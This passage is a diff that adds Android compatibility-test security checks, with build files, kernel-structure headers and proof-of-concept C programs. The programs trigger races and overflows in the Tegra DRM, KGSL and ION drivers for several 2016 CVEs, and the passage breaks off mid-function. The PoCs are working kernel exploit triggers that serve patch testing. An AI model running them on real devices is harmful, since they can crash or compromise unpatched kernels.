+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_SUBMIT DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_SUBMIT, struct drm_tegra_submit)
+#define DRM_IOCTL_TEGRA_GEM_CREATE DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_GEM_CREATE, struct drm_tegra_gem_create)
+#define DRM_IOCTL_GEM_CLOSE DRM_IOW (0x09, struct drm_gem_close)
+#define DRM_IOCTL_MODE_MAP_DUMB DRM_IOWR(0xB3, struct drm_mode_map_dumb)
+
+struct drm_tegra_syncpt {
+ __u32 id;
+ __u32 incrs;
+};
+
+struct list_head {
+ struct list_head *next, *prev;
+};
+
+struct kobject {
+ const char *name;
+ struct list_head entry;
+ struct kobject *parent;
+ void *kset;
+ void *ktype;
+ void *sd;
+ unsigned long refcount;
+ unsigned int state_initialized:1;
+ unsigned int state_in_sysfs:1;
+ unsigned int state_add_uevent_sent:1;
+ unsigned int state_remove_uevent_sent:1;
+ unsigned int uevent_suppress:1;
+};
+
+struct device {
+ struct device *parent;
+ void *p;
+ void* pad0[8];
+ char *init_name;
+ void *type;
+ void* pad1[5];
+ void *bus;
+ void *driver;
+ void *platform_data;
+ void *driver_data;
+};
+
+struct host1x_info {
+ int nb_channels;
+ int nb_pts;
+ int nb_bases;
+ int nb_mlocks;
+ int (*init)(void *);
+ int sync_offset;
+};
+
+struct host1x_syncpt_ops {
+ void (*restore)(void *syncpt);
+ void (*restore_wait_base)(void *syncpt);
+ void (*load_wait_base)(void *syncpt);
+ __u32 (*load)(void *syncpt);
+ int (*cpu_incr)(void *syncpt);
+ int (*patch_wait)(void *syncpt, void *patch_addr);
+};
+
+struct host1x {
+ struct host1x_info *info;
+ void *regs;
+ void *syncpt;
+ void *bases;
+ struct device *dev;
+ void *clk;
+ void *clk_actmon;
+ void* pad[5];
+ void *intr_wq;
+ int intr_syncpt_irq;
+ int intr_general_irq;
+ __u32 intstatus;
+ void (*host_isr[32])(__u32, void *);
+ void *host_isr_priv[32];
+ struct host1x_syncpt_ops *syncpt_op;
+ void *intr_op;
+ void *channel_op;
+ void *cdma_op;
+ void *cdma_pb_op;
+ void *actmon_op;
+ void *debug_op;
+};
+
+struct host1x_client {
+ struct list_head list;
+ void *parent;
+ struct device *dev;
+ void *ops;
+};
+
+struct tegra_drm_client_ops {
+ void* open_channel;
+ void* close_channel;
+ void* reset;
+ void* is_add_reg;
+ void* submit;
+};
+
+struct tegra_drm_client {
+ unsigned char pad[232];
+ struct list_head list;
+ struct tegra_drm_client_ops *ops;
+};
+
+struct tegra_drm_context {
+ struct tegra_drm_client *client;
+ void *channel;
+ struct list_head list;
+};
+
+struct drm_tegra_reloc {
+ struct {
+ __u32 handle;
+ __u32 offset;
+ } cmdbuf;
+ struct {
+ __u32 handle;
+ __u32 offset;
+ } target;
+ __u32 shift;
+ __u32 pad;
+};
+
+#endif
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8432/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8432/poc.c
new file mode 100644
index 0000000..52b48f2
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8432/poc.c
@@ -0,0 +1,146 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include <sys/ioctl.h>
+
+#include "local_poc.h"
+
+#define LOG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
+#define ERR(fmt, ...) printf(fmt " %d %s\n", ##__VA_ARGS__, errno, strerror(errno))
+
+#define DEV "/dev/dri/renderD129"
+#define CMD_NUM 100
+
+int dev_fd;
+
+volatile struct drm_tegra_open_channel open_c;
+volatile struct drm_tegra_submit submit_c;
+volatile struct drm_tegra_gem_create gem_create;
+volatile struct drm_gem_close gem_close;
+
+volatile struct drm_tegra_cmdbuf cmdbufs[CMD_NUM];
+struct drm_tegra_syncpt syncpt;
+volatile struct drm_tegra_reloc relocs[CMD_NUM];
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ }
+ return ret;
+}
+
+static int prepare()
+{
+ int i;
+
+ open_c.client = HOST1X_CLASS_VIC;
+
+ submit_c.num_syncpts = 1;
+ submit_c.syncpts = (__u64)&syncpt;
+
+ gem_close.handle = 1;
+
+ for(i = 0; i < CMD_NUM; i++){
+ cmdbufs[i].words = 0;
+ cmdbufs[i].offset = 0;
+ cmdbufs[i].handle = 0;
+ relocs[i].cmdbuf.handle = 0;
+ relocs[i].cmdbuf.offset = 0;
+ relocs[i].target.handle = 0;
+ relocs[i].target.offset = 0;
+ }
+
+ submit_c.num_cmdbufs = CMD_NUM;
+ submit_c.cmdbufs = (__u64)cmdbufs;
+
+ submit_c.num_relocs = CMD_NUM;
+ submit_c.relocs = (__u64)relocs;
+
+ gem_create.size = PAGE_SIZE;
+
+ return 0;
+}
+
+#define SUBMIT_THREAD_NUM 1
+pthread_t submit_thread_id[SUBMIT_THREAD_NUM] = { 0 };
+static void* submit_thread(void *no_use)
+{
+ set_affinity(1);
+ ioctl(dev_fd, DRM_IOCTL_TEGRA_SUBMIT, &submit_c);
+ return NULL;
+}
+
+int main()
+{
+ int ret;
+ int i;
+ __u64 try_time;
+
+ set_affinity(0);
+
+ dev_fd = open(DEV,O_RDONLY);
+ if(dev_fd == -1){
+ return 0;
+ }
+
+ prepare();
+
+ ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == -1){
+ goto out_dev;
+ }
+
+ submit_c.context = open_c.context;
+
+ try_time = 1;
+ while(1){
+ ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_GEM_CREATE, &gem_create);
+ if(ret == 0){
+ for(i = 0; i < CMD_NUM; i++){
+ cmdbufs[i].handle = gem_create.handle;
+ relocs[i].cmdbuf.handle = gem_create.handle;
+ relocs[i].target.handle = gem_create.handle;
+ }
+ for(i = 0; i < SUBMIT_THREAD_NUM; i++){
+ pthread_create(submit_thread_id + i, NULL, submit_thread, NULL);
+ }
+ usleep(150);
+ while(ioctl(dev_fd, DRM_IOCTL_GEM_CLOSE, &gem_close) == 0);
+ }
+ try_time++;
+ }
+
+ for(i = 0; i < SUBMIT_THREAD_NUM; i++){
+ pthread_join(submit_thread_id[i], NULL);
+ }
+
+out_dev:
+ close(dev_fd);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8434/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8434/Android.mk
new file mode 100644
index 0000000..6b20fe4
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8434/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8434
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8434/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8434/poc.c
new file mode 100644
index 0000000..de88a3b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8434/poc.c
@@ -0,0 +1,171 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdlib.h>
+#include <unistd.h>
+#include <errno.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sched.h>
+
+#define KGSL_CONTEXT_SAVE_GMEM 0x00000001
+#define KGSL_CONTEXT_NO_GMEM_ALLOC 0x00000002
+/* This is a cmdbatch exclusive flag - use the CMDBATCH equivalent instead */
+#define KGSL_CONTEXT_SUBMIT_IB_LIST 0x00000004
+#define KGSL_CONTEXT_CTX_SWITCH 0x00000008
+#define KGSL_CONTEXT_PREAMBLE 0x00000010
+#define KGSL_CONTEXT_TRASH_STATE 0x00000020
+#define KGSL_CONTEXT_PER_CONTEXT_TS 0x00000040
+#define KGSL_CONTEXT_USER_GENERATED_TS 0x00000080
+/* This is a cmdbatch exclusive flag - use the CMDBATCH equivalent instead */
+#define KGSL_CONTEXT_END_OF_FRAME 0x00000100
+#define KGSL_CONTEXT_NO_FAULT_TOLERANCE 0x00000200
+/* This is a cmdbatch exclusive flag - use the CMDBATCH equivalent instead */
+#define KGSL_CONTEXT_SYNC 0x00000400
+#define KGSL_CONTEXT_PWR_CONSTRAINT 0x00000800
+
+#define KGSL_IOC_TYPE 0x09
+struct kgsl_drawctxt_create {
+ unsigned int flags;
+ unsigned int drawctxt_id; /*output param */
+};
+
+#define IOCTL_KGSL_DRAWCTXT_CREATE \
+ _IOWR(KGSL_IOC_TYPE, 0x13, struct kgsl_drawctxt_create)
+
+/* destroy a draw context */
+struct kgsl_drawctxt_destroy {
+ unsigned int drawctxt_id;
+};
+
+#define IOCTL_KGSL_DRAWCTXT_DESTROY \
+ _IOW(KGSL_IOC_TYPE, 0x14, struct kgsl_drawctxt_destroy)
+
+struct kgsl_timestamp_event {
+ int type; /* Type of event (see list below) */
+ unsigned int timestamp; /* Timestamp to trigger event on */
+ unsigned int context_id; /* Context for the timestamp */
+ void __user *priv; /* Pointer to the event specific blob */
+ size_t len; /* Size of the event specific blob */
+};
+#define IOCTL_KGSL_TIMESTAMP_EVENT \
+ _IOWR(KGSL_IOC_TYPE, 0x33, struct kgsl_timestamp_event)
+int g_fd = -1;
+int g_ctx_id = -1;
+int g_sync_fence_fd = -1;
+struct kgsl_timestamp_event g_event;
+static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
+static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
+
+void trigger_kgsl_create_drawctx() {
+ struct kgsl_drawctxt_create ctx;
+ ctx.flags = KGSL_CONTEXT_PREAMBLE | KGSL_CONTEXT_NO_GMEM_ALLOC;
+ ioctl(g_fd, IOCTL_KGSL_DRAWCTXT_CREATE, &ctx);
+ printf("[*] IOCTL_KGSL_DRAWCTXT_CREATE id(%d), errno = %d\n", ctx.drawctxt_id, errno);
+ g_ctx_id = ctx.drawctxt_id;
+}
+
+void trigger_kgsl_free_drawctx(int id) {
+ struct kgsl_drawctxt_destroy ctx;
+ ctx.drawctxt_id = id;
+ ioctl(g_fd, IOCTL_KGSL_DRAWCTXT_DESTROY, &ctx);
+ //printf("[*] IOCTL_KGSL_DRAWCTXT_DESTROY, errno = %d\n", errno);
+}
+
+void trigger_kgsl_timestamp_event() {
+
+
+ //mprotect(event.priv, 0x1000, PROT_READ);
+
+ ioctl(g_fd, IOCTL_KGSL_TIMESTAMP_EVENT, &g_event);
+ printf("[*] IOCTL_KGSL_TIMESTAMP_EVENT fd(%d), errno = %d\n", *(int*)g_event.priv, errno);
+}
+
+int open_driver() {
+ char* dev_path = "/dev/kgsl-3d0";
+ g_fd = open(dev_path, O_RDWR);
+ if (g_fd < 0) {
+ printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
+ } else {
+ printf("[*] open file(%s) succ!\n", dev_path);
+ }
+ return g_fd;
+}
+
+
+void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
+ setpriority(PRIO_PROCESS, gettid(), privi);
+ printf("[*] setpriority(%d) errno = %d\n", privi, errno);
+
+ /* bind process to a CPU*/
+ if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
+ printf("[*] sched_setaffinity(%ld) errno = %d\n", cpu_mask, errno);
+ }
+}
+
+
+void* race_thread(void* arg) {
+ setup_privi_and_affinity(-19, 2);
+ pthread_mutex_lock(&mutex);
+ pthread_cond_wait(&cond, &mutex);
+ pthread_mutex_unlock(&mutex);
+ while (1) {
+ close(4);
+ }
+ return NULL;
+}
+
+int main(int argc, char**argv) {
+ setup_privi_and_affinity(-19, 1);
+
+ if (open_driver() < 0) {
+ return -1;
+ }
+ trigger_kgsl_create_drawctx();
+
+ g_event.type = 2;
+ g_event.context_id = g_ctx_id;
+ g_event.len = 4;
+ g_event.priv = malloc(0x1000);
+ g_event.timestamp = 0;
+ mprotect(g_event.priv, 0x1000, PROT_READ);
+ //printf("[*] close fd errno = %d\n", errno);
+
+ pthread_t tid;
+ pthread_create(&tid, NULL, race_thread, NULL);
+ usleep(100 * 1000);
+
+ pthread_cond_signal(&cond);
+ usleep(20);
+ while (1) {
+ trigger_kgsl_timestamp_event();
+ }
+
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8435/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8435/Android.mk
new file mode 100644
index 0000000..62efb65
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8435/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8435
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8435/local_pwn.h b/hostsidetests/security/securityPatch/CVE-2016-8435/local_pwn.h
new file mode 100644
index 0000000..70574fe
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8435/local_pwn.h
@@ -0,0 +1,116 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __local_pwn_H__
+#define __local_pwn_H__
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_SUBMIT 0x08
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ __u64 context;
+};
+
+struct drm_tegra_submit {
+ __u64 context;
+ __u32 num_syncpts;
+ __u32 num_cmdbufs;
+ __u32 num_relocs;
+ __u32 num_waitchks;
+ __u32 waitchk_mask;
+ __u32 timeout;
+ __u64 syncpts;
+ __u64 cmdbufs;
+ __u64 relocs;
+ __u64 waitchks;
+ __u32 fence; /* Return value */
+ __u32 reserved0;
+ __u64 fences;
+ __u32 reserved1[2]; /* future expansion */
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_SUBMIT DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_SUBMIT, struct drm_tegra_submit)
+
+struct drm_tegra_syncpt {
+ __u32 id;
+ __u32 incrs;
+};
+
+struct list_head {
+ struct list_head *next, *prev;
+};
+
+struct tegra_drm_client_ops {
+ void* open_channel;
+ void* close_channel;
+ void* reset;
+ void* is_add_reg;
+ void* submit;
+};
+
+struct tegra_drm_client {
+ /* sizeof(host1x_client) is 232 */
+ unsigned char pad[232]; /* maybe gadget arguments */
+ struct list_head list;
+ struct tegra_drm_client_ops *ops;
+};
+
+struct tegra_drm_context {
+ struct tegra_drm_client *client;
+ void *channel;
+ struct list_head list;
+ /* FIXME we need pass lock op */
+ //struct mutex lock;
+ //bool keepon;
+ //struct host1x_user user;
+};
+
+#endif
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8435/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8435/poc.c
new file mode 100644
index 0000000..ff6acb0
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8435/poc.c
@@ -0,0 +1,74 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sys/types.h>
+#include <unistd.h>
+#include <sys/syscall.h>
+
+#include "local_pwn.h"
+
+#define DEV "/dev/dri/renderD129"
+#define SYN_NUM 64
+
+struct drm_tegra_open_channel open_c = { 0 };
+struct drm_tegra_submit submit_c = { 0 };
+struct drm_tegra_syncpt syncpts[SYN_NUM] = { 0 };
+
+int main()
+{
+ int ret;
+ int dev_fd;
+ int i;
+
+ /* open dev */
+ dev_fd = open(DEV,O_RDONLY);
+ if(dev_fd == -1){
+ printf("[-] open dev failed %d %s\n", errno, strerror(errno));
+ return 0;
+ }
+
+ /* prepare for ioctl */
+ open_c.client = HOST1X_CLASS_VIC;
+ submit_c.num_syncpts = SYN_NUM;
+ submit_c.syncpts = (__u64)syncpts;
+
+ for(i = 1; i < SYN_NUM; i++){
+ syncpts[i].id = 192;
+ syncpts[i].incrs = 0xffff;
+ }
+
+ /* open channel */
+ ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == -1){
+ printf("[-] open_channel failed %d %s\n", errno, strerror(errno));
+ goto out_dev;
+ }
+ submit_c.context = open_c.context;
+ printf("[+] call submit\n");
+ ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_SUBMIT, &submit_c);
+ printf("[+] submit return %d\n", ret);
+
+out_dev:
+ close(dev_fd);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-9120/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-9120/Android.mk
new file mode 100644
index 0000000..95ddb3d
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-9120/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-9120
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-9120/poc.c b/hostsidetests/security/securityPatch/CVE-2016-9120/poc.c
new file mode 100644
index 0000000..c03ee45
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-9120/poc.c
@@ -0,0 +1,175 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <errno.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sched.h>
+
+typedef int ion_user_handle_t;
+
+enum ion_heap_type {
+ ION_HEAP_TYPE_SYSTEM,
+ ION_HEAP_TYPE_SYSTEM_CONTIG,
+ ION_HEAP_TYPE_CARVEOUT,
+ ION_HEAP_TYPE_CHUNK,
+ ION_HEAP_TYPE_DMA,
+ ION_HEAP_TYPE_CUSTOM, /* must be last so device specific heaps always
+ are at the end of this enum */
+ ION_NUM_HEAPS = 16,
+};
+
+#define ION_HEAP_SYSTEM_MASK (1 << ION_HEAP_TYPE_SYSTEM)
+#define ION_HEAP_SYSTEM_CONTIG_MASK (1 << ION_HEAP_TYPE_SYSTEM_CONTIG)
+#define ION_HEAP_CARVEOUT_MASK (1 << ION_HEAP_TYPE_CARVEOUT)
+#define ION_HEAP_TYPE_DMA_MASK (1 << ION_HEAP_TYPE_DMA)
+
+#define ION_NUM_HEAP_IDS sizeof(unsigned int) * 8
+
+struct ion_allocation_data {
+ size_t len;
+ size_t align;
+ unsigned int heap_id_mask;
+ unsigned int flags;
+ ion_user_handle_t handle;
+};
+
+
+struct ion_fd_data {
+ ion_user_handle_t handle;
+ int fd;
+};
+
+
+struct ion_handle_data {
+ ion_user_handle_t handle;
+};
+
+
+struct ion_custom_data {
+ unsigned int cmd;
+ unsigned long arg;
+};
+#define ION_IOC_MAGIC 'I'
+
+#define ION_IOC_ALLOC _IOWR(ION_IOC_MAGIC, 0, \
+ struct ion_allocation_data)
+
+#define ION_IOC_FREE _IOWR(ION_IOC_MAGIC, 1, struct ion_handle_data)
+
+
+#define ION_FLAG_CACHED 1 /* mappings of this buffer should be
+ cached, ion will do cache
+ maintenance when the buffer is
+ mapped for dma */
+#define ION_FLAG_CACHED_NEEDS_SYNC 2 /* mappings of this buffer will created
+ at mmap time, if this is set
+ caches must be managed manually */
+
+int g_fd = -1;
+struct ion_allocation_data* g_allocation = NULL;
+struct ion_handle_data g_free_data;
+static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
+static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
+
+int open_driver() {
+ char* dev_path = "/dev/ion";
+ g_fd = open(dev_path, O_RDONLY);
+ if (g_fd < 0) {
+ printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
+ } else {
+ printf("[*] open file(%s) succ!\n", dev_path);
+ }
+ return g_fd;
+}
+
+void prepare_data() {
+ void* data = malloc(0x1000);
+
+ g_allocation = (struct ion_allocation_data*)data;
+
+ g_allocation->len = 0x1000;
+ g_allocation->align = 8;
+ g_allocation->heap_id_mask = 1 << 25;
+ g_allocation->flags = ION_FLAG_CACHED;
+ g_allocation->handle = -1;
+
+ mprotect(data, 0x1000, PROT_READ);
+ printf("[*] mprotect, error = %d\n", errno);
+
+ g_free_data.handle = 1;
+}
+
+void trigger_ion_alloc() {
+ ioctl(g_fd, ION_IOC_ALLOC, g_allocation);
+}
+
+void trigger_ion_free() {
+ ioctl(g_fd, ION_IOC_FREE, &g_free_data);
+}
+
+void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
+ setpriority(PRIO_PROCESS, gettid(), privi);
+
+ /* bind process to a CPU*/
+ if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
